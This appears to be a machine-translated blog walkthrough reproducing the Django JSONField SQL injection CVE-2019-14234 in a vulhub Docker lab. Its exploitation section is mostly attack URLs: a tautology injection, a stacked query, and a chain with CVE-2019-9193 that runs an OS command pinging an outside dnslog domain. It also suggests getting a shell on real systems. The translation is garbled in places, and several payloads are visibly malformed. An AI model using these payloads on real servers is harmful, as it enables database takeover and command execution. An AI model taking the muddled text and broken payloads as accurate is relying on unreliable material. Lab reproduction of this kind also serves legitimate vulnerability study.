Shulou(Shulou.com)05/31 Report--

How to analyze the recurrence of CVE-2019-14234 Django JSONField SQL injection vulnerabilities, many novices are not very clear about this. In order to help you solve this problem, the following editor will explain it in detail. People with this need can come and learn. I hope you can get something.

Introduction to 0x01

Django is a popular open source web framework written by Python, and many websites and app are based on Django.

What is JSONField,Django is a large and comprehensive Web framework, which supports many database engines, including Postgresql, Mysql, Oracle, Sqlite3, etc., but there is no better database that is born as a pair with Django than Postgresql, and Django officials also recommend using it with Postgresql.

The data types supported by Mysql,Postgresql are richer than those supported by NoSQL, and its support for data in JSON format gives this relational database some of the characteristics of NoSQL.

Brief introduction of 0x02 vulnerabilities

The vulnerability requires that the developer uses JSONField/HStoreField, and the user can control the key name of the queryset query, and inject SQL statements in the location of the key name.

Django is usually paired with a postgresql database, and JSONField is a data type of that database. The reason for this vulnerability lies in the implementation of the JSONField class in Django. The most essential function of Django's model is to generate SQL statements, while when Django generates sql statements through JSONField, it is through simple string concatenation.

Get the KeyTransform class through the JSONField class and generate the location of the sql statement.

Where key_name is a controllable string, and the resulting statement is WHERE (field- >'[key_name]') =

'value', can therefore do SQL injection.

0x03 affects version

Django main development branch

Django 2.2.x < 2.2.4

Django 2.1.x < 2.1.11

Django 1.11.x < 1.11.23

0x04 environment building

Build a docker environment using vulhub

Vulhub download address: https://github.com/vulhub/vulhub

Cd vulhub/django/CVE-2019-14234 /

Docker-compose up-d

The following page appears when the browser accesses http://ip:8000, which shows that the construction is successful.

0x05 vulnerability exploitation

Through the analysis of the code, we can know that if you use JSONField in your Django and the "key name" of the query is controllable, you can do SQL injection.

Visit http://ip:8000/admin

Enter the user name admin, password a123123123

Then construct URL to query, payload:

Http://ip:8000/admin/vuln/collection/?detail__a'b=123

You can see that the above image has been successfully injected, and you can see the constructed SQL statement to continue to construct payload

Http://ip:8000/admin/vuln/collection/?detail__title%27)%3d%271%27 or 1%3d1%2d%2d%20

Since or 1 is always true, all results should be returned

Combined with CVE-2019-9193, we try to inject commands and construct url as follows

Http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1% 3bcreate table cmd_exec (cmd_output text) -% 20

Although the page result reported an error, the reason for the error is no results to fetch, indicating that our statement has been executed

Use dnslog to detect whether commands can be executed

Dnslog Web site: http://dnslog.cn/

Payload:

Http://192.168.10.195:8000/admin/vuln/collection/?detail__title')%3d'1' or 1%3d1 3bcopy cmd_exec FROM PROGRAM 'ping k1anij.dnslog.cn

'- -% 20

Traffic detected successfully

The postgresql database docker in the reproduction environment does not have external port mapping. If it is open or in the real environment, you can also combine msf to getshell through CVE-2019-9193.

0x06 repair mode

Update to the latest version

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.